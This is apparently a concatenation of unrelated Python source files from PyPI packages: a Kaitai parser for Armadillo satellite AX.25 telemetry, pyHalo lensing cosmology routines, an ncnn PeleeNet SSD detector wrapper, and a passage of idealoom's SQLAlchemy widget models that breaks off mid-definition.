self.ax25_header = Armadillo.Ax25Header(self._io, self, self._root)
_on = (self.ax25_header.ctl & 19)
if _on == 0:
self.payload = Armadillo.IFrame(self._io, self, self._root)
elif _on == 3:
self.payload = Armadillo.UiFrame(self._io, self, self._root)
elif _on == 19:
self.payload = Armadillo.UiFrame(self._io, self, self._root)
elif _on == 16:
self.payload = Armadillo.IFrame(self._io, self, self._root)
elif _on == 18:
self.payload = Armadillo.IFrame(self._io, self, self._root)
elif _on == 2:
self.payload = Armadillo.IFrame(self._io, self, self._root)
class Ax25Header(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.dest_callsign_raw = Armadillo.CallsignRaw(self._io, self, self._root)
self.dest_ssid_raw = Armadillo.SsidMask(self._io, self, self._root)
self.src_callsign_raw = Armadillo.CallsignRaw(self._io, self, self._root)
self.src_ssid_raw = Armadillo.SsidMask(self._io, self, self._root)
self.ctl = self._io.read_u1()
class UiFrame(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.pid = self._io.read_u1()
_on = self._parent.ax25_header.src_callsign_raw.callsign_ror.callsign
if _on == u"KE5DTW":
self.data_payload = Armadillo.ArmadilloPayload(self._io, self, self._root)
class Callsign(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.callsign = (self._io.read_bytes(6)).decode(u"ASCII")
class IFrame(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.pid = self._io.read_u1()
self.ax25_info = self._io.read_bytes_full()
class SsidMask(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.ssid_mask = self._io.read_u1()
@property
def ssid(self):
if hasattr(self, '_m_ssid'):
return self._m_ssid if hasattr(self, '_m_ssid') else None
self._m_ssid = ((self.ssid_mask & 15) >> 1)
return self._m_ssid if hasattr(self, '_m_ssid') else None
class ArmadilloPayload(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.pb_magic = self._io.read_bytes(5)
self.time_since_epoch = self._io.read_u4le()
self.uptime = self._io.read_u4le()
self.avail_nvmem = self._io.read_u4le()
self.pos_x = self._io.read_f4le()
self.pos_y = self._io.read_f4le()
self.pos_z = self._io.read_f4le()
self.vel_x = self._io.read_f4le()
self.vel_y = self._io.read_f4le()
self.vel_z = self._io.read_f4le()
self.pwr_states_reserved = self._io.read_bits_int_be(3)
self.gps_power = self._io.read_bits_int_be(1) != 0
self.adc_power = self._io.read_bits_int_be(1) != 0
self.antenna_power = self._io.read_bits_int_be(1) != 0
self.pdd_power = self._io.read_bits_int_be(1) != 0
self.spacecraft_mode = self._io.read_bits_int_be(1) != 0
self._io.align_to_byte()
self.vbatt = self._io.read_u2le()
self.input_current = self._io.read_u2le()
self.output_current = self._io.read_u2le()
self.boot_count = self._io.read_u4le()
self.boot_cause = self._io.read_u1()
self.eps_temp_1 = self._io.read_s2le()
self.eps_temp_2 = self._io.read_s2le()
self.eps_temp_3 = self._io.read_s2le()
self.eps_temp_4 = self._io.read_s2le()
self.eps_bp4a = self._io.read_s2le()
self.eps_bp4b = self._io.read_s2le()
self.eps_output_1_current = self._io.read_u2le()
self.eps_output_2_current = self._io.read_u2le()
self.eps_output_3_current = self._io.read_u2le()
self.eps_output_4_current = self._io.read_u2le()
self.eps_output_5_current = self._io.read_u2le()
self.eps_output_6_current = self._io.read_u2le()
self.rxwl_temp_x = self._io.read_f4le()
self.rxwl_temp_y = self._io.read_f4le()
self.rxwl_temp_z = self._io.read_f4le()
self.gyro_temp_x = self._io.read_f4le()
self.gyro_temp_y = self._io.read_f4le()
self.gyro_temp_z = self._io.read_f4le()
self.desired_quaternion_a = self._io.read_f4le()
self.desired_quaternion_b = self._io.read_f4le()
self.desired_quaternion_c = self._io.read_f4le()
self.desired_quaternion_d = self._io.read_f4le()
self.estimated_quaternion_a = self._io.read_f4le()
self.estimated_quaternion_b = self._io.read_f4le()
self.estimated_quaternion_c = self._io.read_f4le()
self.estimated_quaternion_d = self._io.read_f4le()
self.rotation_rate_x = self._io.read_f4le()
self.rotation_rate_y = self._io.read_f4le()
self.rotation_rate_z = self._io.read_f4le()
self.sun_sensor_address = self._io.read_u1()
self.message = (KaitaiStream.bytes_terminate(self._io.read_bytes(110), 0, False)).decode(u"ASCII")
class CallsignRaw(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self._raw__raw_callsign_ror = self._io.read_bytes(6)
self._raw_callsign_ror = KaitaiStream.process_rotate_left(self._raw__raw_callsign_ror, 8 - (1), 1)
_io__raw_callsign_ror = KaitaiStream(BytesIO(self._raw_callsign_ror))
self.callsign_ror = Armadillo.Callsign(_io__raw_callsign_ror, self, self._root)
|
PypiClean
|
/pyhalo-1.0.0-py3-none-any.whl/pyHalo/Halos/lens_cosmo.py
|
import numpy
from scipy.interpolate import interp1d
from scipy.optimize import minimize
from scipy.special import erfc
from lenstronomy.Cosmo.nfw_param import NFWParam
import astropy.units as un
from colossus.lss.bias import twoHaloTerm
from scipy.integrate import quad
class LensCosmo(object):
def __init__(self, z_lens=None, z_source=None, cosmology=None):
"""
This class performs calcuations relevant for certain halo mass profiles and lensing-related quantities for a
given lens/source redshift and cosmology
:param z_lens: deflector redshift
:param z_source: source redshift
:param cosmology: and instance of the Cosmology class (see pyhalo.Cosmology.cosmology.py)
"""
if cosmology is None:
from pyHalo.Cosmology.cosmology import Cosmology
cosmology = Cosmology()
self.cosmo = cosmology
self._arcsec = 2 * numpy.pi / 360 / 3600
self.h = self.cosmo.h
# critical density of the universe in M_sun h^2 Mpc^-3
rhoc = un.Quantity(self.cosmo.astropy.critical_density(0), unit=un.Msun / un.Mpc ** 3).value
self.rhoc = rhoc / self.cosmo.h ** 2
if z_lens is not None and z_source is not None:
# critical density for lensing in units M_sun * Mpc ^ -2
self.sigma_crit_lensing = self.get_sigma_crit_lensing(z_lens, z_source)
# critical density for lensing in units M_sun * kpc ^ -2
self.sigma_crit_lens_kpc = self.sigma_crit_lensing * (0.001) ** 2
# critical density for lensing in units M_sun * arcsec ^ -2 at lens redshift
self.sigmacrit = self.sigma_crit_lensing * (0.001) ** 2 * self.cosmo.kpc_proper_per_asec(z_lens) ** 2
# lensing distances
self.D_d, self.D_s, self.D_ds = self.cosmo.D_A_z(z_lens), self.cosmo.D_A_z(z_source), self.cosmo.D_A(
z_lens, z_source)
self._computed_zacc_pdf = False
self._nfw_param = NFWParam(self.cosmo.astropy)
self.z_lens = z_lens
self.z_source = z_source
def two_halo_boost(self, m200, z, rmin=0.5, rmax=10):
"""
Computes the average contribution of the two halo term in a redshift slice adjacent
the main deflector. Returns a rescaling factor applied to the mass function normalization
:param m200: host halo mass
:param z: redshift
:param rmin: lower limit of the integral, something like the virial radius ~500 kpc
:param rmax: Upper limit of the integral, this is computed based on redshift spacing during
the rendering of halos
:return: scaling factor applied to the normalization of the LOS mass function
"""
mean_boost = 2 * quad(self.twohaloterm, rmin, rmax, args=(m200, z))[0] / (rmax - rmin)
# factor of two for symmetry in front/behind host halo
return 1. + mean_boost
def twohaloterm(self, r, M, z, mdef='200c'):
"""
Computes the boost to the background density of the Universe
from correlated structure around a host of mass M
:param r:
:param M:
:param z:
:param mdef:
:return:
"""
h = self.cosmo.h
M_h = M * h
r_h = r * h
rho_2h = twoHaloTerm(r_h, M_h, z, mdef=mdef) / self.cosmo._colossus_cosmo.rho_m(z)
return rho_2h
def nfw_physical2angle(self, m, c, z, no_interp=False):
"""
converts the physical mass and concentration parameter of an NFW profile into the lensing quantities
updates lenstronomy implementation with arbitrary redshift
:param m: mass enclosed 200 rho_crit in units of M_sun (physical units, meaning no little h)
:param c: NFW concentration parameter (r200/r_s)
:param no_interp: bool; compute NFW params with interpolation
:return: Rs_angle (angle at scale radius) (in units of arcsec), alpha_Rs (observed bending angle at the scale radius
"""
dd = self.cosmo.D_A_z(z)
rho0, Rs, r200 = self.nfwParam_physical(m, c, z)
Rs_angle = Rs / dd / self._arcsec # Rs in arcsec
alpha_Rs = rho0 * (4 * Rs ** 2 * (1 + numpy.log(1. / 2.)))
sigma_crit = self.get_sigma_crit_lensing(z, self.z_source)
return Rs_angle, alpha_Rs / sigma_crit / dd / self._arcsec
def rN_M(self, M, z, N):
"""
computes the radius R_N of a halo of mass M in physical mass M/h, where N is a number multiplying the critical
density of the Universe at z
:param M: halo mass in M_sun/h
:param z: redshift
:param N: number, e.g. N=200 computes r200
:return: radius R_N in physical Mpc/h
"""
rn_mpc_over_h = (3 * M / (4 * numpy.pi * self._nfw_param.rhoc_z(z) * N)) ** (1. / 3.)
return rn_mpc_over_h / self.cosmo.h
def nfwParam_physical(self, m, c, z):
"""
returns the NFW parameters in physical units
updates lenstronomy implementation with arbitrary redshift
:param m: physical mass in M_sun
:param c: concentration
:return: rho0 [Msun/Mpc^3], Rs [Mpc], r200 [Mpc]
"""
r200 = self._nfw_param.r200_M(m * self.h, z) / self.h # physical radius r200
rho0 = self._nfw_param.rho0_c(c, z) * self.h**2 # physical density in M_sun/Mpc**3
Rs = r200/c
return rho0, Rs, r200
def NFW_params_physical(self, m, c, z):
"""
returns the NFW parameters in physical units
:param M: physical mass in M_sun
:param c: concentration
:return: rho0 [Msun/kpc^3], Rs [kpc], r200 [kpc]
"""
rho0, Rs, r200 = self.nfwParam_physical(m, c, z)
return rho0 * 1000 ** -3, Rs * 1000, r200 * 1000
def sigma_crit_mass(self, z, area):
"""
:param z: redshift
:param area: physical area in Mpc^2
:return: the 'critical density mass' sigma_crit * A in units M_sun
"""
sigma_crit_mpc = self.get_sigma_crit_lensing(z, self.z_source)
return area * sigma_crit_mpc
@property
def colossus(self):
return self.cosmo.colossus
######################################################
"""ACCESS ROUTINES IN STRUCTURAL PARAMETERS CLASS"""
######################################################
def mthermal_to_halfmode(self, m_thermal):
"""
Convert thermal relic particle mass to half-mode mass
:param m_thermaal:
:return:
"""
# too lazy for algebra
def _func(m):
return abs(self.halfmode_to_thermal(m)-m_thermal)/0.01
return minimize(_func, x0=10**8, method='Nelder-Mead')['x']
def halfmode_to_thermal(self, m_half_mode):
"""
Converts a half mode mass in units of solar masses (no little h) to the mass of
the corresponding thermal relic particle in keV
:param m: half mode mass in solar masses
:return: thermal relic particle mass in keV
"""
omega_matter = self.cosmo.astropy.Om0
return 2.32 * (omega_matter / 0.25)**0.4 * (self.cosmo.h/0.7)**0.8 * \
(m_half_mode / 10 ** 9) ** (-0.3)
def mhm_to_fsl(self, m_hm):
"""
Converts half mode mass to free streaming length in Mpc
See Equations 5-8 in https://arxiv.org/pdf/1112.0330.pdf
:param m_hm: half-mode mass in units M_sun (no little h)
:return: free streaming length in units Mpc
"""
rhoc = self.rhoc * self.cosmo.h ** 2
l_hm = 2 * (3 * m_hm / (4 * numpy.pi * rhoc)) ** (1. / 3)
l_fs = l_hm / 13.93
return l_fs
##################################################################################
"""ROUTINES RELATED TO LENSING STUFF"""
##################################################################################
def get_sigma_crit_lensing(self, z1, z2):
"""
:param z1: redshift lens
:param z2: redshift source
:return: critical density for lensing in units of M_sun / Mpc ^ 2
"""
D_ds = self.cosmo.D_A(z1, z2)
D_d = self.cosmo.D_A_z(z1)
D_s = self.cosmo.D_A_z(z2)
d_inv = D_s*D_ds**-1*D_d**-1
# (Mpc ^2 / sec^2) * (Mpc^-3 M_sun^1 sec ^ 2) * Mpc ^-1 = M_sun / Mpc ^2
epsilon_crit = (self.cosmo.c**2*(4*numpy.pi*self.cosmo.G)**-1)*d_inv
return epsilon_crit
# ##################################################################################
# """Routines relevant for NFW profiles"""
# ##################################################################################
# def NFW_params_physical(self, M, c, z):
# """
#
# :param M: physical M200
# :param c: concentration
# :param z: halo redshift
# :return: physical NFW parameters in kpc units
# """
#
# rho0, Rs, r200 = self.nfwParam_physical_Mpc(M, c, z)
# return rho0 * 1000 ** -3, Rs * 1000, r200 * 1000
#
# def nfw_physical2angle_fromNFWparams(self, rhos, rs, z):
#
# """
# computes the deflection angle properties of an NFW halo from the density normalization mass and scale radius
# :param rhos: central density normalization in M_sun / Mpc^3
# :param rs: scale radius in Mpc
# :param z: redshift
# :return: theta_Rs (deflection angle at the scale radius) [arcsec], scale radius [arcsec]
# """
#
# D_d = self.cosmo.D_A_z(z)
# Rs_angle = rs / D_d / self.cosmo.arcsec # Rs in arcsec
# theta_Rs = rhos * (4 * rs ** 2 * (1 + numpy.log(1. / 2.)))
# eps_crit = self.get_sigma_crit_lensing(z, self.z_source)
#
# return Rs_angle, theta_Rs / eps_crit / D_d / self.cosmo.arcsec
#
# def nfw_physical2angle(self, M, c, z):
# """
# converts the physical mass and concentration parameter of an NFW profile into the lensing quantities
# :param M: mass enclosed 200 \rho_crit
# :param c: NFW concentration parameter (r200/r_s)
# :return: theta_Rs (observed bending angle at the scale radius, Rs_angle (angle at scale radius) (in units of arcsec)
# """
#
# rhos, rs, _ = self.nfwParam_physical_Mpc(M, c, z)
# return self.nfw_physical2angle_fromNFWparams(rhos, rs, z)
#
# def rho0_c_NFW(self, c, z_eval_rho=0., N=200):
# """
# computes density normalization as a function of concentration parameter
#
# :param c: concentration
# :param z_eval_rho: redshift at which to evaluate the critical density
# :param N: the density contrast used to define the halo mass
# :return: density normalization in h^2/Mpc^3 (comoving)
# """
#
# rho_crit = self.cosmo.rho_crit(z_eval_rho) / self.cosmo.h ** 2
# return N / 3 * rho_crit * c ** 3 / (numpy.log(1 + c) - c / (1 + c))
#
# def rN_M_nfw_comoving(self, M, N, z):
# """
# computes the radius R_N of a halo of mass M in comoving distances
# :param M: halo mass in M_sun/h
# :type M: float or numpy array
# :return: radius R_200 in comoving Mpc/h
# """
#
# rho_crit = self.cosmo.rho_crit(z) / self.cosmo.h ** 2
# return (3 * M / (4 * numpy.pi * rho_crit * N)) ** (1. / 3.)
#
# def nfwParam_physical_Mpc(self, M, c, z, N=200):
#
# """
#
# :param M: halo mass in units M_sun (no little h)
# :param c: concentration parameter
# :param z: redshift
# :return: physical rho_s, rs for the NFW profile in comoving units
# Mass definition critical density of Universe with respect to critical density at redshift z
# Also specified in colossus as 200c
# """
#
# h = self.cosmo.h
# r200 = self.rN_M_nfw_comoving(M * h, N, z) / h # comoving virial radius
# rhos = self.rho0_c_NFW(c, z, N) * h ** 2 # density in M_sun/Mpc**3
# rs = r200 / c
# return rhos, rs, r200
##################################################################################
"""Routines relevant for other lensing by other mass profiles"""
##################################################################################
def point_mass_factor_z(self, z):
"""
Returns the cosmology-dependent factor to evaluate the Einstein radius of a point mass of mass M:
:param z: redshift
:return: The factor that when multiplied by sqrt(mass) gives the Einstein radius of a point mass
R_ein = sqrt(M) * point_mass_factor_z(z)
"""
factor = 4 * self.cosmo.G * self.cosmo.c ** -2
dds = self.cosmo.D_A(z, self.z_source)
dd = self.cosmo.D_A_z(z)
ds = self.D_s
factor *= dds / dd / ds
return factor ** 0.5 / self.cosmo.arcsec
def halo_dynamical_time(self, m_host, z, c_host):
"""
This routine computes the dynamical timescale for a halo of mass M defined as
t = 0.5427 / sqrt(G*rho)
where G is the gravitational constant and rho is the average density
:param m_host: host mass in M_sun
:param z: host redshift
:param c_host: host halo concentration
:return: the dynamical timescale in Gyr
"""
_, _, rvir = self.NFW_params_physical(m_host, c_host, z)
volume = (4/3)*numpy.pi*rvir**3
rho_average = m_host / volume
g = 4.3e-6
return 0.5427 / numpy.sqrt(g*rho_average)
##################################################################################
"""ACCRETION REDSHIFT PDF FROM GALACTICUS"""
##################################################################################
@property
def _subhalo_accretion_pdfs(self):
if self._computed_zacc_pdf is False:
self._computed_zacc_pdf = True
self._mlist, self._dzvals, self._cdfs = self._Msub_cdfs(self.z_lens)
return self._mlist, self._dzvals, self._cdfs
def z_accreted_from_zlens(self, msub, zlens):
mlist, dzvals, cdfs = self._subhalo_accretion_pdfs
idx = self._mass_index(msub, mlist)
z_accreted = zlens + self._sample_cdf_single(cdfs[idx])
return z_accreted
def _cdf_numerical(self, m, z_lens, delta_z_values):
c_d_f = []
prob = 0
for zi in delta_z_values:
prob += self._P_fit_diff_M_sub(z_lens + zi, z_lens, m)
c_d_f.append(prob)
return numpy.array(c_d_f) / c_d_f[-1]
def _Msub_cdfs(self, z_lens):
M_sub_exp = numpy.arange(6.0, 10.2, 0.2)
M_sub_list = 10 ** M_sub_exp
delta_z = numpy.linspace(0., 6, 8000)
funcs = []
for mi in M_sub_list:
# cdfi = P_fit_diff_M_sub_cumulative(z_lens+delta_z, z_lens, mi)
cdfi = self._cdf_numerical(mi, z_lens, delta_z)
funcs.append(interp1d(cdfi, delta_z))
return M_sub_list, delta_z, funcs
def z_decay_mass_dependence(self, M_sub):
# Mass dependence of z_decay.
a = 3.21509397
b = 1.04659814e-03
return a - b * numpy.log(M_sub / 1.0e6) ** 3
def z_decay_exp_mass_dependence(self, M_sub):
# Mass dependence of z_decay_exp.
a = 0.30335749
b = 3.2777e-4
return a - b * numpy.log(M_sub / 1.0e6) ** 3
def _P_fit_diff_M_sub(self, z, z_lens, M_sub):
# Given the redhsift of the lens, z_lens, and the subhalo mass, M_sub, return the
# posibility that the subhlao has an accretion redhisft of z.
z_decay = self.z_decay_mass_dependence(M_sub)
z_decay_exp = self.z_decay_exp_mass_dependence(M_sub)
normalization = 2.0 / numpy.sqrt(2.0 * numpy.pi) / z_decay \
/ numpy.exp(0.5 * z_decay ** 2 * z_decay_exp ** 2) \
/ erfc(z_decay * z_decay_exp / numpy.sqrt(2.0))
return normalization * numpy.exp(-0.5 * ((z - z_lens) / z_decay) ** 2) \
* numpy.exp(-z_decay_exp * (z - z_lens))
def _sample_cdf_single(self, cdf_interp):
u = numpy.random.uniform(0, 1)
try:
output = float(cdf_interp(u))
if numpy.isnan(output):
output = 0
except:
output = 0
return output
def _mass_index(self, subhalo_mass, mass_array):
idx = numpy.argmin(numpy.absolute(subhalo_mass - mass_array))
return idx
|
PypiClean
|
/realsr-ncnn-vulkan-python-1.0.6.tar.gz/realsr-ncnn-vulkan-python-1.0.6/realsr_ncnn_vulkan_python/realsr-ncnn-vulkan/src/ncnn/python/ncnn/model_zoo/peleenetssd.py
|
import ncnn
from .model_store import get_model_file
from ..utils.objects import Detect_Object
class PeleeNet_SSD:
def __init__(self, target_size=304, num_threads=1, use_gpu=False):
self.target_size = target_size
self.num_threads = num_threads
self.use_gpu = use_gpu
self.mean_vals = [103.9, 116.7, 123.6]
self.norm_vals = [0.017, 0.017, 0.017]
self.net = ncnn.Net()
self.net.opt.use_vulkan_compute = self.use_gpu
# model is converted from https://github.com/eric612/MobileNet-YOLO
# and can be downloaded from https://drive.google.com/open?id=1Wt6jKv13sBRMHgrGAJYlOlRF-o80pC0g
# the ncnn model https://github.com/nihui/ncnn-assets/tree/master/models
self.net.load_param(get_model_file("pelee.param"))
self.net.load_model(get_model_file("pelee.bin"))
self.class_names = [
"background",
"person",
"rider",
"car",
"bus",
"truck",
"bike",
"motor",
"traffic light",
"traffic sign",
"train",
]
def __del__(self):
self.net = None
def __call__(self, img):
img_h = img.shape[0]
img_w = img.shape[1]
mat_in = ncnn.Mat.from_pixels_resize(
img,
ncnn.Mat.PixelType.PIXEL_BGR,
img.shape[1],
img.shape[0],
self.target_size,
self.target_size,
)
mat_in.substract_mean_normalize(self.mean_vals, self.norm_vals)
ex = self.net.create_extractor()
ex.set_num_threads(self.num_threads)
ex.input("data", mat_in)
ret, mat_out = ex.extract("detection_out")
objects = []
# printf("%d %d %d\n", mat_out.w, mat_out.h, mat_out.c)
# method 1, use ncnn.Mat.row to get the result, no memory copy
for i in range(mat_out.h):
values = mat_out.row(i)
obj = Detect_Object()
obj.label = values[0]
obj.prob = values[1]
obj.rect.x = values[2] * img_w
obj.rect.y = values[3] * img_h
obj.rect.w = values[4] * img_w - obj.rect.x
obj.rect.h = values[5] * img_h - obj.rect.y
objects.append(obj)
"""
#method 2, use ncnn.Mat->numpy.array to get the result, no memory copy too
out = np.array(mat_out)
for i in range(len(out)):
values = out[i]
obj = Detect_Object()
obj.label = values[0]
obj.prob = values[1]
obj.rect.x = values[2] * img_w
obj.rect.y = values[3] * img_h
obj.rect.w = values[4] * img_w - obj.rect.x
obj.rect.h = values[5] * img_h - obj.rect.y
objects.append(obj)
"""
ret, seg_out = ex.extract("sigmoid")
resized = ncnn.Mat()
ncnn.resize_bilinear(seg_out, resized, img_w, img_h)
return objects, resized
|
PypiClean
|
/idealoom-0.1.0-py3-none-any.whl/assembl/models/widgets.py
|
from itertools import chain
from datetime import datetime
import logging
from sqlalchemy import (
Column, Integer, ForeignKey, Text, String, Boolean, DateTime, inspect)
from sqlalchemy.sql import text, column
from sqlalchemy.orm import (
relationship, backref, aliased, join)
from sqlalchemy.ext.associationproxy import association_proxy
import simplejson as json
from assembl.lib.parsedatetime import parse_datetime
from ..auth import (
CrudPermissions, Everyone, P_ADD_IDEA, P_READ, P_EDIT_IDEA,
P_ADD_POST, P_ADMIN_DISC)
from ..lib.sqla_types import URLString
from . import DiscussionBoundBase
from .discussion import Discussion
from .idea import (Idea, IdeaLink)
from .idea_content_link import IdeaContentWidgetLink
from .generic import Content
from .post import Post, IdeaProposalPost
from .auth import User
from .votes import AbstractVoteSpecification, AbstractIdeaVote
from ..views.traversal import (
RelationCollectionDefinition, AbstractCollectionDefinition,
collection_creation_side_effects, InstanceContext)
from ..semantic.virtuoso_mapping import QuadMapPatternS
from ..semantic.namespaces import (ASSEMBL, QUADNAMES)
log = logging.getLogger(__name__)
class Widget(DiscussionBoundBase):
__tablename__ = "widget"
id = Column(Integer, primary_key=True)
type = Column(String(60), nullable=False)
__mapper_args__ = {
'polymorphic_identity': 'widget',
'polymorphic_on': 'type',
'with_polymorphic': '*'
}
settings = Column(Text) # JSON blob
state = Column(Text) # JSON blob
discussion_id = Column(
Integer,
ForeignKey('discussion.id', ondelete="CASCADE", onupdate="CASCADE"),
nullable=False, index=True
)
discussion = relationship(
Discussion, backref=backref("widgets", cascade="all, delete-orphan"),
info={'rdf': QuadMapPatternS(None, ASSEMBL.in_conversation)})
start_date = Column(DateTime, server_default=None)
end_date = Column(DateTime, server_default=None)
hide_notification = Column(Boolean, server_default='false', default=False)
def __init__(self, *args, **kwargs):
super(Widget, self).__init__(*args, **kwargs)
self.interpret_settings(self.settings_json)
def interpret_settings(self, settings):
pass
def populate_from_context(self, context):
if not(self.discussion or self.discussion_id):
self.discussion = context.get_instance_of_class(Discussion)
super(Widget, self).populate_from_context(context)
def get_discussion_id(self):
return self.discussion_id
@classmethod
def get_discussion_conditions(cls, discussion_id, alias_maker=None):
return (cls.discussion_id == discussion_id,)
@classmethod
def get_ui_endpoint_base(cls):
# TODO: Make this configurable.
return None
@property
def configured(self):
return True
def get_ui_endpoint(self):
uri = self.get_ui_endpoint_base()
assert uri
return "%s?config=%s" % (uri, self.uri())
def get_user_state_url(self):
return 'local:Widget/%d/user_state' % (self.id,)
def get_settings_url(self):
return 'local:Widget/%d/settings' % (self.id,)
def get_state_url(self):
return 'local:Widget/%d/state' % (self.id,)
def get_user_states_url(self):
return 'local:Widget/%d/user_states' % (self.id,)
# Eventually: Use extra_columns to get WidgetUserConfig
# through user_id instead of widget_user_config.id
@property
def settings_json(self):
if self.settings:
settings = json.loads(self.settings)
# Do not allow non-dict settings
if isinstance(settings, dict):
return settings
return {}
@settings_json.setter
def settings_json(self, val):
self.settings = json.dumps(val)
self.interpret_settings(val)
@property
def state_json(self):
if self.state:
return json.loads(self.state)
return {}
@state_json.setter
def state_json(self, val):
self.state = json.dumps(val)
def get_user_state(self, user_id):
state = self.db.query(WidgetUserConfig).filter_by(
widget=self, user_id=user_id).first()
if state:
return state.state_json
def get_all_user_states(self):
return [c.state_json for c in self.user_configs]
def set_user_state(self, user_state, user_id):
state = self.db.query(WidgetUserConfig).filter_by(
widget=self, user_id=user_id).first()
if not state:
state = WidgetUserConfig(widget=self, user_id=user_id)
self.db.add(state)
state.state_json = user_state
def update_from_json(self, json, user_id=None, context=None, object_importer=None,
permissions=None, parse_def_name='default_reverse'):
modified = super(Widget, self).update_from_json(
json, user_id, context, object_importer, permissions, parse_def_name)
if user_id and user_id != Everyone and 'user_state' in json:
modified.set_user_state(json['user_state'], user_id)
return modified
@classmethod
def filter_started(cls, query):
return query.filter(
(cls.start_date == None) | (cls.start_date <= datetime.utcnow()))
@classmethod
def test_active(cls):
now = datetime.utcnow()
return ((cls.end_date == None) | (cls.end_date > now)
& (cls.start_date == None) | (cls.start_date <= now))
@classmethod
def filter_active(cls, query):
return query.filter(cls.test_active())
def is_started(self):
return self.start_date == None or self.start_date <= datetime.utcnow()
def is_ended(self):
return self.end_date != None and self.end_date < datetime.utcnow()
def is_active(self):
return self.is_started() and not self.is_ended()
@property
def activity_state(self):
# TODO: Convert to enum
if not self.is_started():
return "not started"
if self.is_ended():
return "ended"
return "active"
@classmethod
def test_ended(cls):
return (cls.end_date != None) | (cls.end_date < datetime.utcnow())
crud_permissions = CrudPermissions(P_ADMIN_DISC)
def notification_data(self, notification_setting_data):
pass
def has_notification(self):
settings = self.settings_json
notifications = settings.get('notifications', [])
now = datetime.utcnow()
for notification in notifications:
try:
start = parse_datetime(notification['start'])
end = notification.get('end', None)
end = parse_datetime(end) if end else datetime.max
if now < start or now > end:
continue
except (ValueError, TypeError, KeyError) as e:
continue
notification_data = self.notification_data(notification)
if notification_data:
yield notification_data
class IdeaWidgetLink(DiscussionBoundBase):
__tablename__ = 'idea_widget_link'
id = Column(Integer, primary_key=True,
info={'rdf': QuadMapPatternS(None, ASSEMBL.db_id)})
type = Column(String(60))
idea_id = Column(Integer, ForeignKey(Idea.id),
nullable=False, index=True)
idea = relationship(
Idea, primaryjoin=(Idea.id == idea_id),
backref=backref("widget_links", cascade="all, delete-orphan"))
widget_id = Column(Integer, ForeignKey(
Widget.id, ondelete="CASCADE", onupdate="CASCADE"),
nullable=False, index=True)
widget = relationship(Widget, backref=backref(
'idea_links', cascade="all, delete-orphan"))
context_url = Column(URLString())
__mapper_args__ = {
'polymorphic_identity': 'abstract_idea_widget_link',
'polymorphic_on': type,
'with_polymorphic': '*'
}
def populate_from_context(self, context):
if not(self.widget or self.widget_id):
self.widget = context.get_instance_of_class(Widget)
if not(self.idea or self.idea_id):
self.idea = context.get_instance_of_class(Idea)
super(IdeaWidgetLink, self).populate_from_context(context)
def get_discussion_id(self):
idea = self.idea or Idea.get(self.idea_id)
return idea.get_discussion_id()
@classmethod
def get_discussion_conditions(cls, discussion_id, alias_maker=None):
return ((cls.idea_id == Idea.id),
(Idea.discussion_id == discussion_id))
discussion = relationship(
Discussion, viewonly=True, uselist=False, secondary=Idea.__table__,
info={'rdf': QuadMapPatternS(None, ASSEMBL.in_conversation)})
crud_permissions = CrudPermissions(
P_ADD_IDEA, P_READ, P_EDIT_IDEA, P_EDIT_IDEA,
P_EDIT_IDEA, P_EDIT_IDEA)
# Note: declare all subclasses of IdeaWidgetLink here,
# so we can use polymorphic_filter later.
def PolymorphicMixinFactory(base_class):
"""A factory for PolymorphicMixin marker classes"""
class PolymorphicMixin(object):
"A marker class that provides polymorphic_filter"
@classmethod
def polymorphic_identities(cls):
"Return the list of polymorphic identities defined in subclasses"
return [k for (k, v)
in base_class.__mapper__.polymorphic_map.items()
if issubclass(v.class_, cls)]
@classmethod
def polymorphic_filter(cls):
"Return a SQLA expression that tests for subclasses of this class"
return base_class.__mapper__.polymorphic_on.in_(
cls.polymorphic_identities())
return PolymorphicMixin
class BaseIdeaWidgetLink(IdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'base_idea_widget_link',
}
class GeneratedIdeaWidgetLink(IdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'generated_idea_widget_link',
}
IdeaShowingWidgetLink = PolymorphicMixinFactory(
IdeaWidgetLink)
IdeaDescendantsShowingWidgetLink = PolymorphicMixinFactory(
IdeaWidgetLink)
class IdeaInspireMeWidgetLink(
IdeaDescendantsShowingWidgetLink, BaseIdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'idea_inspire_me_widget_link',
}
class IdeaCreativitySessionWidgetLink(
IdeaShowingWidgetLink, BaseIdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'idea_creativity_session_widget_link',
}
class VotableIdeaWidgetLink(IdeaShowingWidgetLink, IdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'votable_idea_widget_link',
}
class VotedIdeaWidgetLink(IdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'voted_idea_widget_link',
}
class VotingCriterionWidgetLink(IdeaWidgetLink):
__mapper_args__ = {
'polymorphic_identity': 'criterion_widget_link',
}
# Then declare relationships
Idea.widgets = association_proxy('widget_links', 'widget')
Widget.showing_idea_links = relationship(
IdeaWidgetLink,
primaryjoin=((Widget.id == IdeaWidgetLink.widget_id)
& IdeaShowingWidgetLink.polymorphic_filter()))
Idea.has_showing_widget_links = relationship(
IdeaWidgetLink,
primaryjoin=((Idea.id == IdeaWidgetLink.idea_id)
& IdeaShowingWidgetLink.polymorphic_filter()))
Widget.showing_ideas = relationship(
Idea, viewonly=True, secondary=IdeaWidgetLink.__table__,
primaryjoin=((Widget.id == IdeaWidgetLink.widget_id)
& IdeaShowingWidgetLink.polymorphic_filter()),
secondaryjoin=IdeaWidgetLink.idea_id == Idea.id,
